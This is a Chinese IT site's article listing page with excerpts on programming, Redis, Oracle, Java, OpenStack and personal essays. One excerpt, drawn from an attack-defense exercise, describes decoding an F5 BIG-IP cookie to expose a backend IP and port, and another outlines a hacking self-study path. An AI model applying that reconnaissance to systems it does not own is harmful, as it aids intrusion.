title="1016 部分A+B (15分)" target="_blank">1016 部分A+B (15分)</a>
<span class="text-muted">km15</span>
<div>//B1016部分A+B.cpp:此文件包含"main"函数。程序执行将在此处开始并结束。——————————wrong:1、Int的范围也没发现,而且longlong转为Int居然没发现,sum没发现,temp也没发现2、数字是减0吗?是的,3、Pa的处理忘了,pa=pa*10+da——————————考察://1、int范围//2、pa=pa*10+da,穷举得出pa——————————lea</div>
</li>
<li><a href="/article/1834206200888127488.htm"
title="#include <netinet/in.h>" target="_blank">#include <netinet/in.h></a>
<span class="text-muted">姜太公钓鲸233</span>
<a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a><a class="tag" taget="_blank" href="/search/socket/1.htm">socket</a>
<div>#include,这是一个标准的网络编程头文件,用于定义IP地址、协议以及与网络接口相关的数据结构和常量。它主要用于在基于IPv4和IPv6的网络编程中。#include的作用头文件包含了处理网络地址的定义和一些网络协议的相关常量,用于支持基于IP(特别是IPv4和IPv6)的网络编程。它提供了一些关键的数据结构和宏,如:常见的结构和宏:structsockaddr_in:用于表示IPv4地址的结</div>
</li>
<li><a href="/article/1834187925462544384.htm"
title="F5BIG-IP会话保持cookie value换算" target="_blank">F5BIG-IP会话保持cookie value换算</a>
<span class="text-muted">木尘zero</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/1.htm">网络协议</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1/1.htm">负载均衡</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/http/1.htm">http</a>
<div>笔者在网络攻防演练时,在client端看到有铭文的F5BIG-IPcookievalue,铭文的value是一段IP和port的换算的组合,可以通过转码的方式换算出后台的IP地址和port。BIGipServer【#poolname】=XXXXXXXXXX.YYYYY.0000【#poolname】,代表F5BIG-IP设备中pool的名称;XXXXXXXXXX,10个十进制的数字代表IP地址;Y</div>
</li>
<li><a href="/article/1834080024043548672.htm"
title="最新网络安全(黑客)——自学篇" target="_blank">最新网络安全(黑客)——自学篇</a>
<span class="text-muted">黑客小雨</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
<div>*需要的小伙伴关注我第一阶段:基础操作入门,学习基础知识入门的第一步是学习一些当下主流的安全工具课程并配套基础原理的书籍,一般来说这个过程在1个月左右比较合适。在这个阶段,你已经对网络安全有了基本的了解。如果你学完了第一步,相信你已经在理论上明白了上面是sql注入,什么是xss攻击,对burp、msf、cs等安全工具也掌握了基础操作。这个时候最重要的就是开始打地基!所谓的“打地基”其实就是系统化的</div>
</li>
<li><a href="/article/1834073791844675584.htm"
title="过年~喝酒" target="_blank">过年~喝酒</a>
<span class="text-muted">想逢一笑</span>
<div>喝点儿酒,一切就都成了醉美的模样儿。酒以其水的外形,火的性格的独特魅力,渗透在我们生活的每一个角落。常言道,无酒不成席,一年的哈酒高峰已拉开帷幕。除夕喝,年五景喝,初一喝了初二喝,反正初七之前是天天喝。回家过年,陪父母喝酒唠嗑,喝的是惬意,没有酒,怎么举杯话家常,没有酒,怎么倾心诉真言。都说年味不浓,只需一杯酒,话儿自然就多啦。小醉微醺,迷迷糊糊之间,互吐衷肠,与家人的距离拉近了。正所谓:喝酒唯小</div>
</li>
<li><a href="/article/1834037030573666304.htm"
title="『Day96星球晨间复盘』" target="_blank">『Day96星球晨间复盘』</a>
<span class="text-muted">佳霏老师</span>
<div>一、Do冥想每日计划阅读《活法》瑜伽笔的故事二、Feel4点多窗外就非常热闹了,有一户人家在拉二胡之类的乐器,还是放什么民间小调,但这样的一种嘈杂,并没有影响我做过自己的事情聊完瑜伽,老师放了一首很好听的音乐stutterbug三、Think持续抱有强烈的愿望。在我们的人生中想要做成某件事,我们首先要描画它的理想状态,然后把实现它的过程在头脑里模拟演练,一直到看见他的结果为止,换句话说就是对这件事</div>
</li>
<li><a href="/article/1833969864285450240.htm"
title="数据分组还在手忙脚乱?Python groupby一招搞定,效率翻倍!" target="_blank">数据分组还在手忙脚乱?Python groupby一招搞定,效率翻倍!</a>
<span class="text-muted">图灵学者</span>
<a class="tag" taget="_blank" href="/search/Python%E5%BA%93/1.htm">Python库</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
<div>目录1、初识groupby:基础用法1.1groupby函数简介1.2准备数据与分组2、按键分组2.1使用lambda表达式2.2自定义key函数3、连续元素分组3.1不连续元素处理3.2连续性与排序4、组合其他itertools模块4.1itertools.chain与groupby4.2itertools.repeat与分组5、实战演练:数据分析应用5.1数据清洗5.2统计分析6、性能优化:高</div>
</li>
<li><a href="/article/1833969107318435840.htm"
title="java计算机毕业设计音乐微信小程序(开题+程序+论文)" target="_blank">java计算机毕业设计音乐微信小程序(开题+程序+论文)</a>
<span class="text-muted">世迁科技</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E8%AF%BE%E7%A8%8B%E8%AE%BE%E8%AE%A1/1.htm">课程设计</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a>
<div>本系统(程序+源码)带文档lw万字以上文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景随着移动互联网的飞速发展,微信小程序作为一种轻量级的应用形态,凭借其无需下载、即用即走的特性,迅速渗透至用户生活的方方面面。音乐作为人们日常生活中不可或缺的精神食粮,其获取与分享方式也在不断进化。传统音乐应用虽功能丰富,但占用手机内存大、启动速度慢等问题日益凸显。因此,开发一款</div>
</li>
<li><a href="/article/1833875141751304192.htm"
title="焦点网络初级班第25期徐惠娟坚持分享第51天" target="_blank">焦点网络初级班第25期徐惠娟坚持分享第51天</a>
<span class="text-muted">释怀juan</span>
<div>每日分享就是把每天的愉快的!高兴的!沮丧的!纠结的!学习的!领域的和体会的一一说出来。这种方式不但让我们内心深处有释放的空间,还会让我们在不断抒发和写作的同时顿悟到和分析到,或者说能再次看到以及能更加捋顺我们的思维,更好的渗透到生活中!今天分享一个愉快的吧!也可以说是欣慰的!这两天孩子改变巨大!每天都是11点多才回家,老师说他在学校学习,而且是同学都走完了他还在学习。不仅受到同学的钦佩,老师也赞誉</div>
</li>
<li><a href="/article/1833867732123217920.htm"
title="QT QTcpSocket作为客户端" target="_blank">QT QTcpSocket作为客户端</a>
<span class="text-muted">一直在找资料的菜鸟</span>
<a class="tag" taget="_blank" href="/search/qt/1.htm">qt</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/Socket/1.htm">Socket</a><a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a>
<div>前言QTcpSocket是Qt提供的关于TCP网络通信的类。QTcpSocket是一个异步的类,能够非阻塞式发送和接收数据。QTcpSocket内部封装了网络通信相关细节,对外提供便利的接口去帮助开发人员实现简历连接、断开连接、数据收发。主要内容基本使用方式项目文件包含network这里非常重要!!!如果在Qt的pro文件中,不加入network,就无法找到头文件和QTcpSocket类;QT+=</div>
</li>
<li><a href="/article/113.htm"
title="windows下源码安装golang" target="_blank">windows下源码安装golang</a>
<span class="text-muted">616050468</span>
<a class="tag" taget="_blank" href="/search/golang%E5%AE%89%E8%A3%85/1.htm">golang安装</a><a class="tag" taget="_blank" href="/search/golang%E7%8E%AF%E5%A2%83/1.htm">golang环境</a><a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a>
<div> 系统: 64位win7, 开发环境:sublime text 2, go版本: 1.4.1
1. 安装前准备(gcc, gdb, git)
golang在64位系</div>
</li>
<li><a href="/article/240.htm"
title="redis批量删除带空格的key" target="_blank">redis批量删除带空格的key</a>
<span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a>
<div>redis批量删除的通常做法:
redis-cli keys "blacklist*" | xargs redis-cli del
上面的命令在key的前后没有空格时是可以的,但有空格就不行了:
$redis-cli keys "blacklist*"
1) "blacklist:12: 361942420@qq.com</div>
</li>
<li><a href="/article/367.htm"
title="oracle正则表达式的用法" target="_blank">oracle正则表达式的用法</a>
<span class="text-muted">0624chenhong</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/1.htm">正则表达式</a>
<div> 方括号表达示
方括号表达式
描述
[[:alnum:]]
字母和数字混合的字符
[[:alpha:]]
字母字符
[[:cntrl:]]
控制字符
[[:digit:]]
数字字符
[[:graph:]]
图像字符
[[:lower:]]
小写字母字符
[[:print:]]
打印字符
[[:punct:]]
标点符号字符
[[:space:]]</div>
</li>
<li><a href="/article/494.htm"
title="2048源码(核心算法有,缺少几个anctionbar,以后补上)" target="_blank">2048源码(核心算法有,缺少几个anctionbar,以后补上)</a>
<span class="text-muted">不懂事的小屁孩</span>
<a class="tag" taget="_blank" href="/search/2048/1.htm">2048</a>
<div>2048游戏基本上有四部分组成,
1:主activity,包含游戏块的16个方格,上面统计分数的模块
2:底下的gridview,监听上下左右的滑动,进行事件处理,
3:每一个卡片,里面的内容很简单,只有一个text,记录显示的数字
4:Actionbar,是游戏用重新开始,设置等功能(这个在底下可以下载的代码里面还没有实现)
写代码的流程
1:设计游戏的布局,基本是两块,上面是分</div>
</li>
<li><a href="/article/621.htm"
title="jquery内部链式调用机理" target="_blank">jquery内部链式调用机理</a>
<span class="text-muted">换个号韩国红果果</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a>
<div>只需要在调用该对象合适(比如下列的setStyles)的方法后让该方法返回该对象(通过this 因为一旦一个函数称为一个对象方法的话那么在这个方法内部this(结合下面的setStyles)指向这个对象)
function create(type){
var element=document.createElement(type);
//this=element;
</div>
</li>
<li><a href="/article/748.htm"
title="你订酒店时的每一次点击 背后都是NoSQL和云计算" target="_blank">你订酒店时的每一次点击 背后都是NoSQL和云计算</a>
<span class="text-muted">蓝儿唯美</span>
<a class="tag" taget="_blank" href="/search/NoSQL/1.htm">NoSQL</a>
<div>全球最大的在线旅游公司Expedia旗下的酒店预订公司,它运营着89个网站,跨越68个国家,三年前开始实验公有云,以求让客户在预订网站上查询假期酒店时得到更快的信息获取体验。
云端本身是用于驱动网站的部分小功能的,如搜索框的自动推荐功能,还能保证处理Hotels.com服务的季节性需求高峰整体储能。
Hotels.com的首席技术官Thierry Bedos上个月在伦敦参加“2015 Clou</div>
</li>
<li><a href="/article/875.htm"
title="java笔记1" target="_blank">java笔记1</a>
<span class="text-muted">a-john</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
<div>1,面向对象程序设计(Object-oriented Propramming,OOP):java就是一种面向对象程序设计。
2,对象:我们将问题空间中的元素及其在解空间中的表示称为“对象”。简单来说,对象是某个类型的实例。比如狗是一个类型,哈士奇可以是狗的一个实例,也就是对象。
3,面向对象程序设计方式的特性:
3.1 万物皆为对象。
</div>
</li>
<li><a href="/article/1002.htm"
title="C语言 sizeof和strlen之间的那些事 C/C++软件开发求职面试题 必备考点(一)" target="_blank">C语言 sizeof和strlen之间的那些事 C/C++软件开发求职面试题 必备考点(一)</a>
<span class="text-muted">aijuans</span>
<a class="tag" taget="_blank" href="/search/C%2FC%2B%2B%E6%B1%82%E8%81%8C%E9%9D%A2%E8%AF%95%E5%BF%85%E5%A4%87%E8%80%83%E7%82%B9/1.htm">C/C++求职面试必备考点</a>
<div> 找工作在即,以后决定每天至少写一个知识点,主要是记录,逼迫自己动手、总结加深印象。当然如果能有一言半语让他人收益,后学幸运之至也。如有错误,还希望大家帮忙指出来。感激不尽。
后学保证每个写出来的结果都是自己在电脑上亲自跑过的,咱人笨,以前学的也半吊子。很多时候只能靠运行出来的结果再反过来</div>
</li>
<li><a href="/article/1129.htm"
title="程序员写代码时就不要管需求了吗?" target="_blank">程序员写代码时就不要管需求了吗?</a>
<span class="text-muted">asia007</span>
<a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98%E4%B8%8D%E8%83%BD%E4%B8%80%E5%91%B3%E8%B7%9F%E9%9C%80%E6%B1%82%E8%B5%B0/1.htm">程序员不能一味跟需求走</a>
<div> 编程也有2年了,刚开始不懂的什么都跟需求走,需求是怎样就用代码实现就行,也不管这个需求是否合理,是否为较好的用户体验。当然刚开始编程都会这样,但是如果有了2年以上的工作经验的程序员只知道一味写代码,而不在写的过程中思考一下这个需求是否合理,那么,我想这个程序员就只能一辈写敲敲代码了。
我的技术不是很好,但是就不代</div>
</li>
<li><a href="/article/1256.htm"
title="Activity的四种启动模式" target="_blank">Activity的四种启动模式</a>
<span class="text-muted">百合不是茶</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/%E6%A0%88%E6%A8%A1%E5%BC%8F%E5%90%AF%E5%8A%A8/1.htm">栈模式启动</a><a class="tag" taget="_blank" href="/search/Activity%E7%9A%84%E6%A0%87%E5%87%86%E6%A8%A1%E5%BC%8F%E5%90%AF%E5%8A%A8/1.htm">Activity的标准模式启动</a><a class="tag" taget="_blank" href="/search/%E6%A0%88%E9%A1%B6%E6%A8%A1%E5%BC%8F%E5%90%AF%E5%8A%A8/1.htm">栈顶模式启动</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E4%BE%8B%E6%A8%A1%E5%BC%8F%E5%90%AF%E5%8A%A8/1.htm">单例模式启动</a>
<div>android界面的操作就是很多个activity之间的切换,启动模式决定启动的activity的生命周期 ;
启动模式xml中配置
<activity android:name=".MainActivity" android:launchMode="standard&quo</div>
</li>
<li><a href="/article/1383.htm"
title="Spring中@Autowired标签与@Resource标签的区别" target="_blank">Spring中@Autowired标签与@Resource标签的区别</a>
<span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/%40Resource/1.htm">@Resource</a><a class="tag" taget="_blank" href="/search/%40Autowired/1.htm">@Autowired</a><a class="tag" taget="_blank" href="/search/%40Qualifier/1.htm">@Qualifier</a>
<div>Spring不但支持自己定义的@Autowired注解,还支持由JSR-250规范定义的几个注解,如:@Resource、 @PostConstruct及@PreDestroy。
1. @Autowired @Autowired是Spring 提供的,需导入 Package:org.springframewo</div>
</li>
<li><a href="/article/1510.htm"
title="Changes Between SOAP 1.1 and SOAP 1.2" target="_blank">Changes Between SOAP 1.1 and SOAP 1.2</a>
<span class="text-muted">sunjing</span>
<a class="tag" taget="_blank" href="/search/Changes/1.htm">Changes</a><a class="tag" taget="_blank" href="/search/Enable/1.htm">Enable</a><a class="tag" taget="_blank" href="/search/SOAP+1.1/1.htm">SOAP 1.1</a><a class="tag" taget="_blank" href="/search/SOAP+1.2/1.htm">SOAP 1.2</a>
<div>JAX-WS
SOAP Version 1.2 Part 0: Primer (Second Edition)
SOAP Version 1.2 Part 1: Messaging Framework (Second Edition)
SOAP Version 1.2 Part 2: Adjuncts (Second Edition)
Which style of WSDL</div>
</li>
<li><a href="/article/1637.htm"
title="【Hadoop二】Hadoop常用命令" target="_blank">【Hadoop二】Hadoop常用命令</a>
<span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/hadoop/1.htm">hadoop</a>
<div>以Hadoop运行Hadoop自带的wordcount为例,
hadoop脚本位于/home/hadoop/hadoop-2.5.2/bin/hadoop,需要说明的是,这些命令的使用必须在Hadoop已经运行的情况下才能执行
Hadoop HDFS相关命令
hadoop fs -ls
列出HDFS文件系统的第一级文件和第一级</div>
</li>
<li><a href="/article/1764.htm"
title="java异常处理(初级)" target="_blank">java异常处理(初级)</a>
<span class="text-muted">白糖_</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/DAO/1.htm">DAO</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/%E8%99%9A%E6%8B%9F%E6%9C%BA/1.htm">虚拟机</a><a class="tag" taget="_blank" href="/search/Ajax/1.htm">Ajax</a>
<div>从学习到现在从事java开发一年多了,个人觉得对java只了解皮毛,很多东西都是用到再去慢慢学习,编程真的是一项艺术,要完成一段好的代码,需要懂得很多。
最近项目经理让我负责一个组件开发,框架都由自己搭建,最让我头疼的是异常处理,我看了一些网上的源码,发现他们对异常的处理不是很重视,研究了很久都没有找到很好的解决方案。后来有幸看到一个200W美元的项目部分源码,通过他们对异常处理的解决方案,我终</div>
</li>
<li><a href="/article/1891.htm"
title="记录整理-工作问题" target="_blank">记录整理-工作问题</a>
<span class="text-muted">braveCS</span>
<a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a>
<div>1)那位同学还是CSV文件默认Excel打开看不到全部结果。以为是没写进去。同学甲说文件应该不分大小。后来log一下原来是有写进去。只是Excel有行数限制。那位同学进步好快啊。
2)今天同学说写文件的时候提示jvm的内存溢出。我马上反应说那就改一下jvm的内存大小。同学说改用分批处理了。果然想问题还是有局限性。改jvm内存大小只能暂时地解决问题,以后要是写更大的文件还是得改内存。想问题要长远啊</div>
</li>
<li><a href="/article/2018.htm"
title="org.apache.tools.zip实现文件的压缩和解压,支持中文" target="_blank">org.apache.tools.zip实现文件的压缩和解压,支持中文</a>
<span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a>
<div>刚开始用java.util.Zip,发现不支持中文(网上有修改的方法,但比较麻烦)
后改用org.apache.tools.zip
org.apache.tools.zip的使用网上有更简单的例子
下面的程序根据实际需求,实现了压缩指定目录下指定文件的方法
import java.io.BufferedReader;
import java.io.BufferedWrit</div>
</li>
<li><a href="/article/2145.htm"
title="读书笔记-4" target="_blank">读书笔记-4</a>
<span class="text-muted">chengxuyuancsdn</span>
<a class="tag" taget="_blank" href="/search/%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/1.htm">读书笔记</a>
<div>1、JSTL 核心标签库标签
2、避免SQL注入
3、字符串逆转方法
4、字符串比较compareTo
5、字符串替换replace
6、分拆字符串
1、JSTL 核心标签库标签共有13个,
学习资料:http://www.cnblogs.com/lihuiyy/archive/2012/02/24/2366806.html
功能上分为4类:
(1)表达式控制标签:out</div>
</li>
<li><a href="/article/2272.htm"
title="[物理与电子]半导体教材的一个小问题" target="_blank">[物理与电子]半导体教材的一个小问题</a>
<span class="text-muted">comsci</span>
<a class="tag" taget="_blank" href="/search/%E9%97%AE%E9%A2%98/1.htm">问题</a>
<div>
各种模拟电子和数字电子教材中都有这个词汇-空穴
书中对这个词汇的解释是; 当电子脱离共价键的束缚成为自由电子之后,共价键中就留下一个空位,这个空位叫做空穴
我现在回过头翻大学时候的教材,觉得这个</div>
</li>
<li><a href="/article/2399.htm"
title="Flashback Database --闪回数据库" target="_blank">Flashback Database --闪回数据库</a>
<span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E9%97%AA%E5%9B%9E%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">闪回数据库</a>
<div>Flashback 技术是以Undo segment中的内容为基础的, 因此受限于UNDO_RETENTON参数。要使用flashback 的特性,必须启用自动撤销管理表空间。
在Oracle 10g中, Flash back家族分为以下成员: Flashback Database, Flashback Drop,Flashback Query(分Flashback Query,Flashbac</div>
</li>
<li><a href="/article/2526.htm"
title="简单排序:插入排序" target="_blank">简单排序:插入排序</a>
<span class="text-muted">dieslrae</span>
<a class="tag" taget="_blank" href="/search/%E6%8F%92%E5%85%A5%E6%8E%92%E5%BA%8F/1.htm">插入排序</a>
<div>
public void insertSort(int[] array){
int temp;
for(int i=1;i<array.length;i++){
temp = array[i];
for(int k=i-1;k>=0;k--)</div>
</li>
<li><a href="/article/2653.htm"
title="C语言学习六指针小示例、一维数组名含义,定义一个函数输出数组的内容" target="_blank">C语言学习六指针小示例、一维数组名含义,定义一个函数输出数组的内容</a>
<span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/c/1.htm">c</a>
<div># include <stdio.h>
int main(void)
{
int * p; //等价于 int *p 也等价于 int* p;
int i = 5;
char ch = 'A';
//p = 5; //error
//p = &ch; //error
//p = ch; //error
p = &i; // </div>
</li>
<li><a href="/article/2780.htm"
title="centos下php redis扩展的安装配置3种方法" target="_blank">centos下php redis扩展的安装配置3种方法</a>
<span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a>
<div>方法一
1.下载php redis扩展包 代码如下 复制代码
#wget http://redis.googlecode.com/files/redis-2.4.4.tar.gz
2 tar -zxvf 解压压缩包,cd /扩展包 (进入扩展包然后 运行phpize 一下是我环境中phpize的目录,/usr/local/php/bin/phpize (一定要</div>
</li>
<li><a href="/article/2907.htm"
title="线程池(Executors)" target="_blank">线程池(Executors)</a>
<span class="text-muted">shuizhaosi888</span>
<a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B%E6%B1%A0/1.htm">线程池</a>
<div>在java类库中,任务执行的主要抽象不是Thread,而是Executor,将任务的提交过程和执行过程解耦
public interface Executor {
void execute(Runnable command);
}
public class RunMain implements Executor{
@Override
pub</div>
</li>
<li><a href="/article/3034.htm"
title="openstack 快速安装笔记" target="_blank">openstack 快速安装笔记</a>
<span class="text-muted">haoningabc</span>
<a class="tag" taget="_blank" href="/search/openstack/1.htm">openstack</a>
<div>前提是要配置好yum源
版本icehouse,操作系统redhat6.5
最简化安装,不要cinder和swift
三个节点
172 control节点keystone glance horizon
173 compute节点nova
173 network节点neutron
control
/etc/sysctl.conf
net.ipv4.ip_forward =</div>
</li>
<li><a href="/article/3161.htm"
title="从c面向对象的实现理解c++的对象(二)" target="_blank">从c面向对象的实现理解c++的对象(二)</a>
<span class="text-muted">jimmee</span>
<a class="tag" taget="_blank" href="/search/C%2B%2B/1.htm">C++</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1/1.htm">面向对象</a><a class="tag" taget="_blank" href="/search/%E8%99%9A%E5%87%BD%E6%95%B0/1.htm">虚函数</a>
<div>1. 类就可以看作一个struct,类的方法,可以理解为通过函数指针的方式实现的,类对象分配内存时,只分配成员变量的,函数指针并不需要分配额外的内存保存地址。
2. c++中类的构造函数,就是进行内存分配(malloc),调用构造函数
3. c++中类的析构函数,就时回收内存(free)
4. c++是基于栈和全局数据分配内存的,如果是一个方法内创建的对象,就直接在栈上分配内存了。
专门在</div>
</li>
<li><a href="/article/3288.htm"
title="如何让那个一个div可以拖动" target="_blank">如何让那个一个div可以拖动</a>
<span class="text-muted">lingfeng520240</span>
<a class="tag" taget="_blank" href="/search/html/1.htm">html</a>
<div>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml</div>
</li>
<li><a href="/article/3415.htm"
title="第10章 高级事件(中)" target="_blank">第10章 高级事件(中)</a>
<span class="text-muted">onestopweb</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%8B%E4%BB%B6/1.htm">事件</a>
<div>index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/</div>
</li>
<li><a href="/article/3542.htm"
title="计算两个经纬度之间的距离" target="_blank">计算两个经纬度之间的距离</a>
<span class="text-muted">roadrunners</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97/1.htm">计算</a><a class="tag" taget="_blank" href="/search/%E7%BA%AC%E5%BA%A6/1.htm">纬度</a><a class="tag" taget="_blank" href="/search/LBS/1.htm">LBS</a><a class="tag" taget="_blank" href="/search/%E7%BB%8F%E5%BA%A6/1.htm">经度</a><a class="tag" taget="_blank" href="/search/%E8%B7%9D%E7%A6%BB/1.htm">距离</a>
<div>要解决这个问题的时候,到网上查了很多方案,最后计算出来的都与百度计算出来的有出入。下面这个公式计算出来的距离和百度计算出来的距离是一致的。
/**
*
* @param longitudeA
* 经度A点
* @param latitudeA
* 纬度A点
* @param longitudeB
* </div>
</li>
<li><a href="/article/3669.htm"
title="最具争议的10个Java话题" target="_blank">最具争议的10个Java话题</a>
<span class="text-muted">tomcat_oracle</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
<div>1、Java8已经到来。什么!? Java8 支持lambda。哇哦,RIP Scala! 随着Java8 的发布,出现很多关于新发布的Java8是否有潜力干掉Scala的争论,最终的结论是远远没有那么简单。Java8可能已经在Scala的lambda的包围中突围,但Java并非是函数式编程王位的真正觊觎者。
2、Java 9 即将到来
Oracle早在8月份就发布</div>
</li>
<li><a href="/article/3796.htm"
title="zoj 3826 Hierarchical Notation(模拟)" target="_blank">zoj 3826 Hierarchical Notation(模拟)</a>
<span class="text-muted">阿尔萨斯</span>
<a class="tag" taget="_blank" href="/search/rar/1.htm">rar</a>
<div> 题目链接:zoj 3826 Hierarchical Notation
题目大意:给定一些结构体,结构体有value值和key值,Q次询问,输出每个key值对应的value值。
解题思路:思路很简单,写个类词法的递归函数,每次将key值映射成一个hash值,用map映射每个key的value起始终止位置,预处理完了查询就很简单了。 这题是最后10分钟出的,因为没有考虑value为{}的情</div>
</li>
</ul>
</div>
</div>
</div>
<div>
<div class="container">
<div class="indexes">
<strong>按字母分类:</strong>
<a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
</div>
</div>
</div>
<footer id="footer" class="mb30 mt30">
<div class="container">
<div class="footBglm">
<a target="_blank" href="/">首页</a> -
<a target="_blank" href="/custom/about.htm">关于我们</a> -
<a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
<a target="_blank" href="/sitemap.txt">Sitemap</a> -
<a target="_blank" href="/custom/delete.htm">侵权投诉</a>
</div>
<div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
</div>
</div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>
</body>
</html>